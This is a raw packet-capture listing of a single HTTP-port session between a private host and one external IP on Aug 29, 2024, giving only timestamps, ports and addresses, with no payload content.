Aug 29, 2024 15:42:50.815709114 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.815726042 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.815742970 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.815747976 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.815758944 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.815777063 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.815782070 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.815782070 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.815789938 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.815807104 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.815823078 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.815831900 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.815831900 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.815838099 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.815855980 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.815856934 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.815875053 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.815890074 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.815893888 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.815893888 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.815893888 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.815906048 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.815917015 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.815922976 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.815938950 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.815941095 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.815941095 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.815957069 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.815962076 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.815978050 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.816000938 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.816396952 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.816420078 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.816436052 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.816451073 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.816462994 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.816467047 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.816502094 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.816502094 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.816553116 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.816571951 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.816593885 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.816595078 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.816612959 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.816627026 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.816627026 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.816632032 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.816648960 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.816653967 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.816665888 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.816682100 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.816684961 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.816685915 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.816699028 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.816710949 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.816715956 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.816730022 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.816730022 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.816731930 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.816750050 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.816766977 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.816782951 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.816788912 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.816788912 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.816788912 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.816801071 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.816812038 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.816812038 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.816817999 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.816834927 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.816854954 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.816855907 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.816855907 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.816869020 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.816886902 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.817292929 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.817308903 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.817325115 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.817339897 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.817352057 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.817352057 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.817353964 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.817370892 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.817373037 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.817388058 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.817397118 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.817401886 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.817416906 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.817423105 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.817435026 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.817451000 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.817465067 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.817466021 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.817467928 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.817485094 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.817490101 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.817502022 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.817517042 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.817517996 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.817533970 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.817544937 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.817550898 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.817567110 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.817569017 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.817584991 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.817594051 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.817594051 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.817600965 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.817614079 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.817631006 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.817660093 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.824610949 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.824635029 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.824698925 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.824716091 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.825222015 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.825237989 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.825253963 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.825284004 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.825336933 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.825340986 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.825355053 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.825371981 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.825390100 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.825397015 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.825397015 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.825423002 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.825423002 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.825463057 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.825478077 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.825493097 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.825504065 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.825509071 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.825531006 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.825531960 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.825548887 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.825598955 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.825613976 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.825629950 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.825639009 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.825664043 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.825696945 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.825747013 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.825762987 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.825778008 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.825789928 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.825794935 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.825809956 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.825813055 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.825828075 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.825830936 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.825836897 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.825867891 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.825867891 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.825875044 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.825891972 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.825910091 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.825917959 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.825937033 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.825949907 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.825967073 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.825978041 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.825984001 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.825994015 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.826000929 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.826021910 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.826021910 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.826039076 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.826069117 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.826086998 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.826105118 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.826124907 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.826158047 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.826265097 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.826288939 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.826304913 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.826320887 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.826328993 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.826343060 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.826343060 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.826348066 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.826365948 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.826395035 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.826401949 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.826412916 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.826428890 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.826442003 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.826442003 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.826443911 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.826462030 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.826462030 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.826494932 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.826494932 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.826538086 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.826555014 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.826569080 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.826581001 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.826592922 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.826606035 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.826606035 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.826617956 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.826632977 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.826642990 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.826652050 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.826668978 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.826668978 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.826670885 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.826689005 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.826699018 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.826725006 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.826725006 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.826747894 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.826765060 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.826798916 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.826798916 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.827002048 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.827023983 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.827040911 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.827055931 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.827061892 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.827061892 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.827073097 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.827090025 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.827092886 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.827092886 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.827107906 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.827122927 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.827122927 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.827167034 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.827182055 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.827197075 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.827202082 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.827202082 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.827214956 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.827236891 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.827236891 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.827251911 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.827294111 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.827310085 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.827347040 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.827347040 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.827426910 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.827442884 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.827457905 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.827472925 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.827483892 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.827483892 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.827490091 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.827503920 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.827507973 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.827517986 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.827529907 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.827533007 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.827549934 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.827572107 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.827581882 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.827588081 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.827604055 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.827622890 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.827622890 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.827629089 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.827645063 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.827646017 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.827663898 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.827680111 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.827691078 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.827691078 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.827696085 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.827712059 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.827712059 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.827713966 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.827730894 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.827749014 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.827749014 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.827781916 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.827905893 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.827922106 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.827963114 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.827963114 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828001976 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828017950 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828033924 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828049898 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828049898 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828052044 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828069925 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828085899 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828102112 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828116894 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828124046 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828124046 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828134060 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828135014 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828155994 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828186035 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828208923 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828232050 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828248978 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828263998 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828274965 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828274965 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828280926 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828298092 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828298092 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828298092 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828315020 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828330994 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828340054 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828340054 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828349113 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828357935 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828366995 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828385115 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828385115 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828396082 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828407049 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828424931 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828465939 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828465939 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828557968 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828572989 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828588009 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828602076 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828602076 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828630924 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828630924 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828630924 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828648090 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828654051 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828665018 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828680992 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:50.828685999 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:50.828685999 CEST	49704	80	192.168.2.5	185.215.113.100
